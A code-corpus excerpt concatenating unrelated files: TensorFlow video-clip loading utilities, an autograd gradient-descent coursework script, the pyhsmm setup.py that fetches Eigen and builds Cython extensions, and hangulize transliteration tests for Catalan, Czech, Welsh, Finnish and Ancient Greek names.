lambda: _loop_video_with_offset(video[video_start:,:,:,:], video, frames-video_start, frames, height, width, channel, clip_length+video_start),
lambda: video[video_start:,:,:,:])
number_of_clips = tf.cond(tf.greater(clip_length, frames-video_start),
lambda: 1,
lambda: (frames-video_start-clip_length) / (clip_length - clip_stride) + 1)
clip_begin = tf.range(0, number_of_clips*(clip_length-clip_stride), delta=clip_length-clip_stride)[:num_clips]
rs = tf.reshape(clip_begin, [num_clips,1,1,1])
video = tf.to_int32(video)
clips = tf.map_fn(lambda clip_start: video[clip_start[0][0][0]:clip_start[0][0][0]+clip_length], rs)
return clips
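# Note: a worked example of the sequential branch above, with illustrative values:
# clip_length=16, clip_stride=8 (8 overlapping frames) and num_clips=4 give
# frames_needed = 16 + (16-8)*(4-1) = 40 and clip_begin = tf.range(0, 40, delta=8)[:4]
# = [0, 8, 16, 24], i.e. four 16-frame clips whose start points are 8 frames apart; the
# video is looped first whenever fewer than 40 frames remain after the chosen offset.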
def _loop_video_with_offset(offset_tensor, input_data_tensor, offset_frames, frames, height, width, channel, footprint):
"""
Loop the video the number of times necessary for the number of frames to be > footprint
Args:
:offset_tensor: Raw input data from offset frame number
:input_data_tensor: Raw input data
:frames: Total number of frames
:height: Height of frame
:width: Width of frame
:channel: Total number of color channels
:footprint: Total length of video to be extracted before sampling down
Return:
Looped video
"""
loop_factor = tf.cast(tf.add(tf.divide(tf.subtract(footprint, offset_frames), frames), 1), tf.int32)
loop_stack = tf.stack([loop_factor,1,1,1])
input_data_tensor = tf.tile(input_data_tensor, loop_stack)
reshape_stack = tf.stack([tf.multiply(frames, loop_factor),height,width,channel])
input_data_looped = tf.reshape(input_data_tensor, reshape_stack)
output_data = tf.concat([offset_tensor, input_data_looped], axis = 0)
return output_data
def _reduce_fps(video, frame_count):
"""
Function that drops frames to match 25 pfs from 30 fps captured videos
Args:
:video: Tensor containing video frames
:frame_count: Total number of frames in the video
Return:
Video with reduced number of frames to match 25fps
"""
# Convert from 30 fps to 25 fps
remove_count = tf.cast(tf.ceil(tf.divide(frame_count, 6)), tf.int32)
intermediate_frames = tf.multiply(remove_count, 5)
indices = tf.tile([0,1,2,3,4], [remove_count]) # [[0,1,2,3,4],[0,1,2,3,4]..]
indices = tf.reshape(indices, [intermediate_frames]) # [0,1,2,3,4,0,1,2,3,4,0,1,2....]
additions = tf.range(remove_count) # [0,1,2,3,4,5,6,....]
additions = tf.stack([additions, additions, additions, additions, additions]) # [[0,1,2,3,4,5,6...], [0,1,2,3,4,5,6..], [0,1..], [0,1,..], [0,1,...]]
additions = tf.transpose(additions) # [[0,0,0,0,0], [1,1,1,1,1], [2,2,2,2,2], ...]
additions = tf.reshape(additions, [intermediate_frames]) # [0,0,0,0,0,1,1,1,1,1,2,2,2,2,2,3,3,3,3,3....]
additions = tf.multiply(additions, 6) # [0,0,0,0,0,6,6,6,6,6,12,12,12,12,12,18,18,18,18,18....]
indices = tf.add(indices, additions) # [0,1,2,3,4,6,7,8,9,10,12,13,14,15,16,18,19....]
remove_count = tf.cond( tf.equal(frame_count, tf.multiply(remove_count, 6)),
lambda: remove_count,
lambda: tf.subtract(remove_count, 1))
output_frames = tf.subtract(frame_count, remove_count)
indices = tf.slice(indices, [0], [output_frames])
indices_to_keep = tf.reshape(indices, [output_frames])
output = tf.gather(video, indices_to_keep)
return output, output_frames, indices
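# Note: a worked example of the index arithmetic above: for a 12-frame 30 fps video,
# remove_count = ceil(12/6) = 2 and the kept indices come out as
# [0,1,2,3,4, 6,7,8,9,10] with output_frames = 10, i.e. every sixth frame (5 and 11) is
# dropped, which brings 30 fps down to roughly 25 fps.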
def _error_loading_video():
"""
    Prints that an error occurred while loading the video, indicating that the specified clip_length was longer than the video's frame count
Args:
Return:
returns an integer for tf.cond to function properly in _load_video()
"""
print "If an error occurs: The video loaded contains fewer frames than the specified clip length."
return 0
def load_dataset_without_preprocessing(base_data_path, dataset, istraining, vid_name, verbose=True):
"""
    Function to load the dataset, set up the queue and read data into the queue without preprocessing the video
Args:
:base_data_path: Full path to root directory containing datasets
:dataset: Video dataset to load
:istraining: Boolean variable indicating training/testing phase
:vid_name: Name of video to load if desired
Return:
Input data tensor, label tensor and name of loaded data (video/image)
"""
# Get a list of tfrecords file names from which to pull videos
filenames = []
number_of_tfrecords = 0
for f in os.listdir(base_data_path):
filenames.append(os.path.join(base_data_path,f))
number_of_tfrecords += 1
# END FOR
if verbose:
print "Number of records available: ", number_of_tfrecords
if vid_name == "default":
# Create Queue which will read in videos num_gpus at a time (Queue seeded for repeatability of experiments)
tfrecord_file_queue = tf.train.string_input_producer(filenames, shuffle=istraining, name='file_q', seed=0)
else:
# Create Queue which will read in videos num_gpus at a time (Queue seeded for repeatability of experiments)
tfrecord_file_queue = tf.train.string_input_producer([os.path.join(base_data_path, f)], shuffle=istraining, name='file_q', seed=0)
tf.set_random_seed(0) # To ensure the numbers are generated for temporal offset consistently
# Number of threads to be used
thread_count = 1
# Dequeue video data from queue and convert it from TFRecord format (int64 or bytes)
features = _read_tfrecords(tfrecord_file_queue)
frames = tf.cast(features['Frames'], tf.int32)
height = tf.cast(features['Height'], tf.int32)
width = tf.cast(features['Width'], tf.int32)
channel = tf.cast(features['Channels'], tf.int32)
label = tf.cast(features['Label'], tf.int32)
name = features['Name']
# Shape [frames, height, width, channels]
input_data_tensor = tf.reshape(tf.decode_raw(features['Data'], tf.uint8), tf.stack([frames,height,width,channel]))
# BGR to RGB
input_data_tensor = input_data_tensor[...,::-1]
# Reduction in fps to 25 for HMDB51 dataset
if 'HMDB51' in dataset:
input_data_tensor, frames, indices = _reduce_fps(input_data_tensor, frames)
return input_data_tensor, label, name
``` |
{
"source": "jinwei14/Mathematics-for-Machine-Learning",
"score": 4
} |
#### File: Mathematics-for-Machine-Learning/CW1/tryAutoGrad.py
```python
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import autograd.numpy as np
import math
import matplotlib.pyplot as plt
from autograd import grad
# Thinly wrapped numpy
# Basically everything you need
B = np.array([[3, -1], [-1, 3]])
a = np.array([[1], [0]])
b = np.array([[0], [-1]])
def f1(x):
"""
    This is the function f1: f1(x) = x.T x + x.T B x - a.T x + b.T x
"""
f1 = np.transpose(x).dot(x) + np.transpose(x).dot(B).dot(x) - np.transpose(a).dot(x) + np.transpose(b).dot(x)
return f1
def grad_f1(x):
"""
4 marks
    :param x: input array with shape (2,), i.e. a 2-element vector
    :return: the gradient of f1, with shape (2, )
    The analytic gradient is grad f1(x) = 2(I + B)x - a + b, matching the code below.
"""
x = x.reshape(2, 1)
#fx1 = 2**.dot(x) - matrix_a + matrix_b
fx1 = 2*(np.identity(2) + B).dot(x) - a + b
ans = fx1.reshape(2,)
return ans
def f2(x):
"""
    This is the function f2: f2(x) = sin((x-a).T (x-a)) + (x-b).T B (x-b)
"""
x=x.reshape(2,1)
f2 = math.sin(np.transpose(x-a).dot(x-a)) + np.transpose(x-b).dot(B).dot(x-b)
return f2
def grad_f2(x):
"""
6 marks
:param x: input array with shape (2, )
:return: the gradient of f2, with shape (2, )
    grad f2(x) = 2(x-a) cos((x-a).T (x-a)) + 2B(x-b)
"""
x=x.reshape(2,1)
fx = 2*(x-a)*math.cos( np.transpose(x-a).dot(x-a))+ 2*B.dot(x-b)
# print(fx[1])
# ans = np.array(fx[0],fx[1])
fx = fx.reshape(2,)
return fx
def f3(x):
"""
    This is the function f3.
"""
x = x.reshape(2, 1)
part1 = np.exp(-np.dot((x - a).T, x-a))
part2 = np.exp(-np.dot (np.dot((x - b).T, B),(x-b)))
det = np.linalg.det(0.01 * np.identity(2) + np.dot(x, x.T))
part3 = 0.1 * np.log(det)
func3 = 1 - part1 - part2 + part3
return func3
def grad_f3(x):
"""
This question is optional. The test will still run (so you can see if you are correct by
looking at the testResults.txt file), but the marks are for grad_f1 and grad_f2 only.
Do not delete this function.
:param x: input array with shape (2, )
:return: the gradient of f3, with shape (2, )
"""
grad_f3 = grad(f3)
return grad_f3(x)
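# Note: unlike grad_f1/grad_f2, grad_f3 does not use a hand-derived formula; autograd.grad(f3)
# builds a new function that evaluates the gradient of f3 at a point, which is why f3 is
# written purely with autograd.numpy operations (mixing plain math/numpy calls into the
# traced computation would break the automatic differentiation).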
x= np.array([1,1])
#print(grad_f1(np.array( [ 1,-1 ])).shape )
#print(grad_f3(x))
print(f2(x))
# Run plain gradient descent on f3, starting from x = [1, -1]
cur_x = np.array([1, -1]) # The algorithm starts at x = [1, -1]
gamma = 0.1 # step size multiplier
max_iters = 50 # maximum number of iterations
iters = 0 #iteration counter
x_gd = []
y_gd = []
z_gd = []
while (iters < max_iters):
x_gd.append(cur_x[0])
y_gd.append(cur_x[1])
z_gd.append(f3(cur_x))
prev_x = np.array([cur_x[0],cur_x[1]])
cur_x = prev_x - gamma * grad_f3(prev_x)
iters+=1
print("The local minimum occurs at", cur_x)
xlist = np.linspace(-0.25, 1, 50)
ylist = np.linspace(-1.0, 0, 50)
X,Y = np.meshgrid(xlist,ylist)
#new an array with all 0 inside
Z = np.zeros((50, 50))
for i in range(50):
for j in range(50):
Z[i][j] = f3(np.array([xlist[i],ylist[j]]))
print(Z)
plt.contour(X.T,Y.T, Z, 50, cmap = 'jet')
plt.colorbar()
plt.plot(x_gd, y_gd, color='green', marker='v', linestyle='dashed', linewidth=0.4, markersize=3 )
plt.show()
# Plot the surface.
# fig = plt.figure()
# ax = fig.gca(projection='3d')
#
# surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm,
# linewidth=0, antialiased=False)
#
# # Customize the z axis.
# ax.set_zlim(-1.01, 1.01)
# ax.zaxis.set_major_locator(LinearLocator(10))
# ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
#
# # Add a color bar which maps values to colors.
# fig.colorbar(surf, shrink=0.5, aspect=5)
#
# plt.show()
``` |
{
"source": "jinwensun111/pyhsmm",
"score": 2
} |
#### File: jinwensun111/pyhsmm/setup.py
```python
import shutil
import tarfile
from pathlib import Path
from urllib.request import urlretrieve
import numpy
import requests
from setuptools import Extension, setup
from Cython.Build import cythonize
def download_eigen(deps_dir):
deps_dir = Path(deps_dir)
deps_dir.mkdir(exist_ok=True)
# download Eigen if we don't have it in deps
# TODO: Can we cleanup this?
eigenurl = "https://gitlab.com/libeigen/eigen/-/archive/3.3.7/eigen-3.3.7.tar.gz"
eigenpath = deps_dir.joinpath("Eigen")
eigentarpath = deps_dir.joinpath("Eigen.tar.gz")
if not eigenpath.exists():
print("Downloading Eigen...")
r = requests.get(eigenurl)
with open(eigentarpath, 'wb') as f:
f.write(r.content)
with tarfile.open(eigentarpath, "r") as tar:
tar.extractall("deps")
thedir = next(deps_dir.glob("eigen-*"))
shutil.move(thedir.joinpath("Eigen"), eigenpath)
print("...done!")
def find_extensions(deps_dir):
extensions = []
for pyx in Path("pyhsmm").glob("**/*.pyx"):
ext_name = ".".join(pyx.with_suffix("").parts)
print(f"Extension {ext_name}: {pyx}")
extensions.append(
Extension(
ext_name,
sources=[str(pyx)],
include_dirs=[deps_dir, numpy.get_include()],
extra_compile_args=[
"-O3",
"-std=c++11",
"-DNDEBUG",
"-w",
"-DHMM_TEMPS_ON_HEAP",
],
)
)
return extensions
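# Note: with this layout the Cython extensions are normally compiled in place via
# `python setup.py build_ext --inplace` (or implicitly by `pip install .`); Eigen is only
# fetched into deps/ on the first run, because download_eigen() skips the download when
# deps/Eigen already exists.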
download_eigen("deps")
extensions = find_extensions("deps")
setup(
name="pyhsmm",
version="0.1.6",
description="Bayesian inference in HSMMs and HMMs",
author="<NAME>",
author_email="<EMAIL>",
url="https://github.com/mattjj/pyhsmm",
license="MIT",
packages=["pyhsmm", "pyhsmm.basic", "pyhsmm.internals", "pyhsmm.util"],
platforms="ALL",
keywords=[
"bayesian",
"inference",
"mcmc",
"time-series",
"monte-carlo",
"variational inference",
"mean field",
"vb",
],
install_requires=[
"matplotlib",
"numpy",
"scipy",
"pybasicbayes@git+https://github.com/maxmouchet/pybasicbayes.git",
],
ext_modules=cythonize(extensions),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"Programming Language :: Python",
"Programming Language :: C++",
],
)
``` |
{
"source": "Jinwithyoo/han",
"score": 3
} |
#### File: hangulize/langs/__init__.py
```python
import os
import re
p = os.path
def list_langs():
"""Returns the supported language code list."""
ext = p.extsep + 'py'
init = '__init__' + ext
def _list_langs(prefix='', path=None):
path = path or p.dirname(__file__)
# helpers
name = lambda x: prefix + re.sub(re.escape(ext) + '$', '', x)
def is_lang(x):
if x.startswith(init):
return False
x = p.join(path, x)
return p.isdir(x) and p.isfile(p.join(x, init)) or \
p.isfile(x) and x.endswith(ext)
# find top-level language modules
langs = [name(x) for x in os.listdir(path) if is_lang(x)]
# find sub language modules
for lang in langs:
_path = p.join(path, lang)
if p.isdir(_path):
langs += _list_langs(prefix=lang + '.', path=_path)
langs.sort()
return langs
return _list_langs()
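# Note: list_langs() just walks this package for language modules, so the result mirrors
# whatever languages ship with hangulize; judging from the test modules in this repository
# it would include at least 'cat', 'ces', 'cym', 'fin', 'grc', 'lit', 'spa', 'tur' and
# 'vie', with any nested languages reported in dotted 'parent.child' form.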
def get_list():
"""Deprecated with 0.0.6. Use :func:`hangulize.langs.list_langs`
instead.
"""
import warnings
warnings.warn('get_list() has been deprecated, use list_langs() instead',
DeprecationWarning)
return list_langs()
```
#### File: han/tests/cat.py
```python
from tests import HangulizeTestCase
from hangulize.langs.cat import Catalan
class CatalanTestCase(HangulizeTestCase):
lang = Catalan()
def test_people(self):
self.assert_examples({
'Arantxa': '아란차',
'<NAME>': '발렌티 알미랄',
'<NAME>': '자우메 바르투메우',
'Sergi Bruguera': '세르지 브루게라',
'<NAME>': '몬세라트 카발례',
'<NAME>': '산티아고 칼라트라바',
'<NAME>': '조안 캅데빌라',
'<NAME>': '조제프 카르네르',
'Pau Casals': '파우 카잘스',
'Lluís Companys': '류이스 콤파니스',
'<NAME>': '알렉스 코레자',
'<NAME>': '알베르트 코스타',
'<NAME>': '살바도르 달리',
'Salvador Espriu': '살바도르 에스프리우',
'Cesc Fàbregas': '세스크 파브레가스',
'Pau Gasol': '파우 가졸',
'<NAME>': '안토니 가우디',
'<NAME>': '조제프 과르디올라',
'<NAME>': '샤비 에르난데스',
'<NAME>': '라몬 률',
'<NAME>': '프란세스크 마시아 이 류사',
'<NAME>': '조안 마라갈',
'Ausiàs March': '아우지아스 마르크',
'<NAME>': '조아노트 마르토렐',
'<NAME>': '조안 미로',
'<NAME>': '제라르트 피케',
'<NAME>': '조제프 플라',
'<NAME>': '에우달 프라델',
'<NAME>': '카를레스 푸욜',
'<NAME>': '메르세 로도레다',
'<NAME>': '조르디 사발',
'<NAME>': '조안 마누엘 세라트',
'<NAME>': '조아킴 소롤랴',
'<NAME>': '안토니 타피에스',
'<NAME>': '조제프 타라델랴스',
'<NAME>': '조르디 타레스',
'<NAME>': '자신 베르다게르',
})
def test_places(self):
self.assert_examples({
'Alacant': '알라칸',
'Andorra': '안도라',
'Andorra la Vella': '안도라 라 벨랴',
'Barcelona': '바르셀로나',
'Berga': '베르가',
'Besalú': '베잘루',
'Catalunya': '카탈루냐',
'Cerdanya': '세르다냐',
'Conflent': '콘플렌',
'Eivissa': '에이비사',
'Elx': '엘시',
'Empúries': '엠푸리에스',
'Figueres': '피게레스',
'Girona': '지로나',
'Lleida': '례이다',
'Manresa': '만레자',
'Montjuïc': '몬주이크',
'Montserrat': '몬세라트',
'Osona': '오조나',
'Pallars': '팔랴르스',
'Pallars Jussà': '팔랴르스 주사',
'Pallars Sobirà': '팔랴르스 소비라',
'Palma': '팔마',
'Ribagorça': '리바고르사',
'Rosselló': '로셀료',
'Tarragona': '타라고나',
'Urgell': '우르젤',
'València': '발렌시아',
})
def test_miscellaneous(self):
self.assert_examples({
'Barça': '바르사',
'Camp Nou': '캄 노우',
'Canigó': '카니고',
'Espanyol': '에스파뇰',
'estel·lar': '에스텔라르',
'llengua': '롕과',
'modernisme': '모데르니즈메',
'Renaixença': '레나셴사',
'Sagrada Família': '사그라다 파밀리아',
})
```
#### File: han/tests/ces.py
```python
from tests import HangulizeTestCase
from hangulize.langs.ces import Czech
class CzechTestCase(HangulizeTestCase):
""" http://korean.go.kr/09_new/dic/rule/rule_foreign_0209.jsp """
lang = Czech()
def test_basic(self):
""" http://korean.go.kr/09_new/dic/rule/rule_foreign_0107.jsp """
self.assert_examples({
'barva': '바르바',
'obchod': '옵호트',
'dobrý': '도브리',
'jeřab': '예르자프',
'cigareta': '치가레타',
'nemocnice': '네모츠니체',
'nemoc': '네모츠',
'čapek': '차페크',
'kulečnik': '쿨레치니크',
'míč': '미치',
'dech': '데흐',
'divadlo': '디바들로',
'led': '레트',
"ďábel": '댜벨',
"loďka": '로티카',
"hruď": '흐루티',
'fík': '피크',
'knoflík': '크노플리크',
'gramofon': '그라모폰',
'hadr': '하드르',
'hmyz': '흐미스',
'bůh': '부흐',
'choditi': '호디티',
'chlapec': '흘라페츠',
'prach': '프라흐',
'kachna': '카흐나',
'nikdy': '니크디',
'padák': '파다크',
'lev': '레프',
'šplhati': '슈플하티',
'postel': '포스텔',
'most': '모스트',
'mrak': '므라크',
'podzim': '포드짐',
'noha': '노하',
'podmínka': '포드민카',
'němý': '네미',
'sáňky': '산키',
'Plzeň': '플젠',
'Praha': '프라하',
'koroptev': '코롭테프',
'strop': '스트로프',
'quasi': '크바시',
'ruka': '루카',
'harmonika': '하르모니카',
'mír': '미르',
'řeka': '르제카',
'námořník': '나모르주니크',
'hořký': '호르슈키',
'kouř': '코우르시',
'sedlo': '세들로',
'máslo': '마슬로',
'nos': '노스',
'šaty': '샤티',
'šternberk': '슈테른베르크',
'koš': '코시',
'tam': '탐',
'matka': '마트카',
'bolest': '볼레스트',
'tělo': '텔로',
'štěstí': '슈테스티',
"oběť": '오베티',
'vysoký': '비소키',
'knihovna': '크니호브나',
'kov': '코프',
'xerox': '제록스',
'saxofón': '삭소폰',
'zámek': '자메크',
'pozdní': '포즈드니',
'bez': '베스',
'žižka': '지슈카',
'žvěřina': '주베르지나',
'Brož': '브로시',
'jaro': '야로',
'pokoj': '포코이',
'balík': '발리크',
'komár': '코마르',
'dech': '데흐',
'léto': '레토',
'šest': '셰스트',
'věk': '베크',
'kino': '키노',
'míra': '미라',
'obec': '오베츠',
'nervózni': '네르보즈니',
'buben': '부벤',
'úrok': '우로크',
'dům': '둠',
'jazýk': '야지크',
'líný': '리니',
})
def test_1st(self):
"""제1항: k, p
어말과 유성 자음 앞에서는 '으'를 붙여 적고, 무성 자음 앞에서는
받침으로 적는다.
"""
self.assert_examples({
'mozek': '모제크',
'koroptev': '코롭테프',
})
def test_2nd(self):
"""제2항: b, d, d', g
1. 어말에 올 때에는 '프', '트', '티', '크'로 적는다.
2. 유성 자음 앞에서는 '브', '드', '디', '그'로 적는다.
3. 무성 자음 앞에서 b, g는 받침으로 적고, d, d'는 '트', '티'로 적는다.
"""
self.assert_examples({
'led': '레트',
'ledvina': '레드비나',
'obchod': '옵호트',
'odpadky': '오트파트키',
})
def test_3nd(self):
"""제3항: v, w, z, ř, ž, š
1. v, w, z가 무성 자음 앞이나 어말에 올 때에는 '프, 프, 스'로 적는다.
2. ř, ž가 유성 자음 앞에 올 때에는 '르주', '주', 무성 자음 앞에 올
때에는 '르슈', '슈', 어말에 올 때에는 '르시', '시'로 적는다.
3. š는 자음 앞에서는 '슈', 어말에서는 '시'로 적는다.
"""
self.assert_examples({
'hmyz': '흐미스',
'námořník': '나모르주니크',
'hořký': '호르슈키',
'kouř': '코우르시',
'puška': '푸슈카',
'myš': '미시',
})
def test_4th(self):
"""제4항: l, lj
어중의 l, lj가 모음 앞에 올 때에는 'ㄹㄹ', 'ㄹ리'로 적는다.
"""
self.assert_examples({
'kolo': '콜로',
})
def test_5th(self):
"""제5항: m
m이 r 앞에 올 때에는 '으'를 붙여 적는다.
"""
self.assert_examples({
'humr': '후므르',
})
def test_6th(self):
"""제6항
자음에 '예'가 결합되는 경우에는 '예' 대신에 '에'로 적는다. 다만,
자음이 'ㅅ'인 경우에는 '셰'로 적는다.
"""
self.assert_examples({
'věk': '베크',
'šest': '셰스트',
})
```
#### File: han/tests/cym.py
```python
from tests import HangulizeTestCase
from hangulize.langs.cym import Welsh
class WelshTestCase(HangulizeTestCase):
lang = Welsh()
def test_examples_of_iceager(self):
self.assert_examples({
'Cymru': '컴리',
'Cymraeg': '컴라이그',
'Caernarfon': '카이르나르본',
'Ceredigion': '케레디기온',
'Aberystwyth': '아베러스투이스',
'Brynmawr': '브런마우르',
'Llangollen': '흘란고흘렌',
'Llanelli': '흘라네흘리',
'Gwynedd': '귀네드',
'Ystradgynlais': '어스트라드건라이스',
'Tawe': '타웨',
'Powys': '포위스',
'Meredith': '메레디스',
'Glyndŵr': '글런두르',
'Rhys': '흐리스',
'Ifans': '이반스',
'Emrys': '엠리스',
'Hywel': '허웰',
'Gwilym': '귈림',
'Llinor': '흘리노르',
'Ieuan': '예이안',
'Cerys': '케리스',
'Dafydd': '다비드',
'Iwan': '이완',
'Huw': '히우',
'Ciaran': '키아란',
'Myfanwy': '머바누이',
'Llywelyn': '흘러웰린',
'Calennig': '칼레니그',
'cnapan': '크나판',
'cwm': '쿰',
'fy ngwely': '벙 웰리',
'fy nhadau': '번 하다이',
"Banc Ty'nddôl": '방크 턴돌',
})
```
#### File: han/tests/fin.py
```python
from tests import HangulizeTestCase
from hangulize.langs.fin import Finnish
class FinnishTestCase(HangulizeTestCase):
lang = Finnish()
def test_people(self):
self.assert_examples({
'<NAME>': '알바르 알토',
'Juhani Aho': '유하니 아호',
'Martti Ahtisaari': '마르티 아흐티사리',
'Akseli Gallen-Kallela': '악셀리 갈렌칼렐라',
'Veikko Hakulinen': '베이코 하쿨리넨',
'Pekka Halonen': '페카 할로넨',
'Tarja Halonen': '타리아 할로넨',
'Sami Hyypiä': '사미 휘피애',
'Mika Häkkinen': '미카 해키넨',
'Jussi Jääskeläinen': '유시 얘스켈래이넨',
'Aki Kaurismäki': '아키 카우리스매키',
'Urho Kekkonen': '우르호 케코넨',
'Miikka Kiprusoff': '미카 키프루소프',
'Marja-Liisa Kirvesniemi': '마리아리사 키르베스니에미',
'Mauno Koivisto': '마우노 코이비스토',
'Saku Koivu': '사쿠 코이부',
'Hannes Kolehmainen': '한네스 콜레흐마이넨',
'Jari Kurri': '야리 쿠리',
'Jari Litmanen': '야리 리트마넨',
'Eero Mäntyranta': '에로 맨튀란타',
'Paavo Nurmi': '파보 누르미',
'Ville Ritola': '빌레 리톨라',
'Kimi Räikkönen': '키미 래이쾨넨',
'Eero Saarinen': '에로 사리넨',
'Teemu Selanne': '테무 셀란네',
'Frans Eemil Sillanpää': '프란스 에밀 실란패',
'Tarja Turunen': '타리아 투루넨',
'Artturi Ilmari Virtanen': '아르투리 일마리 비르타넨',
'Yrjö Väisälä': '위리외 배이샐래',
'Tapio Wirkkala': '타피오 비르칼라',
})
def test_places(self):
self.assert_examples({
'Espoo': '에스포',
'Helsinki': '헬싱키',
'Joensuu': '요엔수',
'Jyväskylä': '위배스퀼래',
'Kajaani': '카야니',
'Karjala': '카리알라',
'Kuopio': '쿠오피오',
'Lappeenranta': '라펜란타',
'Mikkeli': '미켈리',
'Nokia': '노키아',
'Oulu': '오울루',
'Rovaniemi': '로바니에미',
'Saimaa': '사이마',
'Savonlinna': '사본린나',
'Suomenlinna': '수오멘린나',
'Suomi': '수오미',
'Tampere': '탐페레',
'Tapiola': '타피올라',
'Turku': '투르쿠',
'Vaasa': '바사',
'Vantaa': '반타',
})
def test_mythology(self):
self.assert_examples({
'Aino': '아이노',
'Ilmarinen': '일마리넨',
'Joukahainen': '요우카하이넨',
'Kalevala': '칼레발라',
'Kullervo': '쿨레르보',
'Lemminkäinen': '렘밍캐이넨',
'Louhi': '로우히',
'Marjatta': '마리아타',
'Pohjola': '포흐욜라',
'Sampo': '삼포',
'Ukko': '우코',
'Väinämöinen': '배이내뫼이넨',
})
def test_miscellaneous(self):
self.assert_examples({
'kantele': '칸텔레',
'sauna': '사우나',
'sisu': '시수',
})
```
#### File: han/tests/grc.py
```python
from tests import HangulizeTestCase
from hangulize.langs.grc import AncientGreek
class AncientGreekTestCase(HangulizeTestCase):
lang = AncientGreek()
def test_examples_of_iceager(self):
self.assert_examples({
'Αἴγυπτος': '아이깁토스',
'Ἀκρόπολις': '아크로폴리스',
'Ἀλεξάνδρεια': '알렉산드레이아',
'Ἁλικαρνασσός': '할리카르나소스',
'Ἀμφίπολις': '암피폴리스',
'Ἀντιόχεια': '안티오케이아',
'Ἄργος': '아르고스',
'Ἀτλάντις': '아틀란티스',
'Ἀττική': '아티케',
'Δαλματία': '달마티아',
'Δαμασκός': '다마스코스',
'Δαρδανέλλια': '다르다넬리아',
'Δεκάπολις': '데카폴리스',
'Δελφοί': '델포이',
'Δῆλος': '델로스',
'Ἐλεφαντίνη': '엘레판티네',
'Ἑλλάς': '헬라스',
'Ἑλλήσποντος': '헬레스폰토스',
'Εὔβοια': '에우보이아',
'Ζάκυνθος': '자킨토스',
'Θῆβαι': '테바이',
'Ἰθάκη': '이타케',
'Ἴλιον': '일리온',
'Ἱσπανία': '히스파니아',
'Ἰωνία': '이오니아',
'Ὄλυμπος': '올림포스',
'Ἑρμιόνη': '헤르미오네',
'Εὐρώπη': '에우로페',
'Ῥοδόπη': '로도페',
'Ῥόδος': '로도스',
'Σαλαμίς': '살라미스',
'Σαμοθρᾴκη': '사모트라케',
'Τῆλος': '텔로스',
'Τιτάν': '티탄',
'Τυῤῥηνία': '티레니아',
'Φρυγία': '프리기아',
'Ὠκεανία': '오케아니아',
'Ὦξος': '옥소스',
'Ὠρίων': '오리온',
'Εὐρυδίκη': '에우리디케',
'Ἀφροδίτη': '아프로디테',
'Ἀπόλλων': '아폴론',
'Ἄρης': '아레스',
'Ἀρτεμίς': '아르테미스',
'Ἀθηνᾶ': '아테나',
'Δημήτηρ': '데메테르',
'Ἥρα': '헤라',
'Ἀχελῷος': '아켈로오스',
'Ἀχέρων': '아케론',
'Ἄδωνις': '아도니스',
'Αἴολος': '아이올로스',
'Ἄτλας': '아틀라스',
'Βορέας': '보레아스',
'Χάος': '카오스',
'Χίμαιρα': '키마이라',
'Χρόνος': '크로노스',
'Δάφνη': '다프네',
'Διόνυσος': '디오니소스',
'Δωρίς': '도리스',
'Ἠώς': '에오스',
'Ἔρις': '에리스',
'Ἔρως': '에로스',
'Γαῖα': '가이아',
'Γανυμήδης': '가니메데스',
'ᾍδης': '하데스',
'Ἥβη': '헤베',
'Ἑκάτη': '헤카테',
'Ἑλένη': '헬레네',
'Ἥλιος': '헬리오스',
'Ἥφαιστος': '헤파이스토스',
'Ἡρακλῆς': '헤라클레스',
'Ἑρμής': '헤르메스',
'Ἑστία': '헤스티아',
'Ὕδρα': '히드라',
'Ὕπνος': '히프노스',
'Ίαπετός': '이아페토스',
'Ἶρις': '이리스',
'Καλλιόπη': '칼리오페',
'Κέρβερος': '케르베로스',
'Κυβέλη': '키벨레',
'Μέδουσα': '메두사',
'Μνήμη': '므네메',
'Μορφεύς': '모르페우스',
'Νέμεσις': '네메시스',
'Νηρεύς': '네레우스',
'Νίκη': '니케',
'Ὠρίων': '오리온',
'Πάν': '판',
'Πανδώρα': '판도라',
'Περσεφόνη': '페르세포네',
'Περσεύς': '페르세우스',
'Φοίβη': '포이베',
'Ποσειδῶν': '포세이돈',
'Προμηθεύς': '프로메테우스',
'Πρωτεύς': '프로테우스',
'Ῥέα': '레아',
'Σεμέλη': '세멜레',
'Σιληνός': '실레노스',
'Σφίγξ': '스핑크스',
'Στύξ': '스틱스',
'Θάνατος': '타나토스',
'Τυφών': '티폰',
'Οὐρανός': '우라노스',
'Ζέφυρος': '제피로스',
'Ζεύς': '제우스',
'Ὀρφεύς': '오르페우스',
'Σαπφώ': '사포',
'Πίνδαρος': '핀다로스',
'Ἱέρων': '히에론',
'Περικλῆς': '페리클레스',
'Ἡρόδοτος': '헤로도토스',
'Πλούταρχος': '플루타르코스',
'Ἀναξαγόρας': '아낙사고라스',
'Ἀρχιμήδης': '아르키메데스',
'Σωκράτης': '소크라테스',
'Πλάτων': '플라톤',
'Ἀριστοτέλης': '아리스토텔레스',
'Ἀλέξανδρος': '알렉산드로스',
'Ἀντιγόνη': '안티고네',
'Οἰδίπους': '오이디푸스',
'Βοιωτία': '보이오티아',
'Θουκυδίδης': '투키디데스',
'Ὅμηρος': '호메로스',
'Ἀριάδνη': '아리아드네',
'Ἰλιάς': '일리아스',
'Ὀδύσσεια': '오디세이아',
'Ἀχιλλεύς': '아킬레우스',
'Ἀγαμέμνων': '아가멤논',
'Μυκήνη': '미케네',
'Θερμοπύλαι': '테르모필라이',
'Λεωνίδας': '레오니다스',
'Ἀναξανδρίδας': '아낙산드리다스',
'Κλεομένης': '클레오메네스',
'Ὀδυσσεύς': '오디세우스',
'Πηνελόπη': '페넬로페',
'Σίσυφος': '시시포스',
'Νεμέα': '네메아',
'Ἰάσων': '이아손',
'Τυνδάρεως': '틴다레오스',
'Αἴας': '아이아스',
'Ἕκτωρ': '헥토르',
'Ἀνδρομάχη': '안드로마케',
'Τροία': '트로이아',
'Ἀντίγονος': '안티고노스',
'Σέλευκος': '셀레우코스',
'Πτολεμαῖος': '프톨레마이오스',
'Πέργαμον': '페르가몬',
'Ἄτταλος': '아탈로스',
'Κροῖσος': '크로이소스',
'Σόλων': '솔론',
'Λυκοῦργος': '리쿠르고스',
'Πολύβιος': '폴리비오스',
'Μίδας': '미다스',
'Κυβέλη': '키벨레',
'Σκύθαι': '스키타이',
'Ἀμαζόνες': '아마조네스',
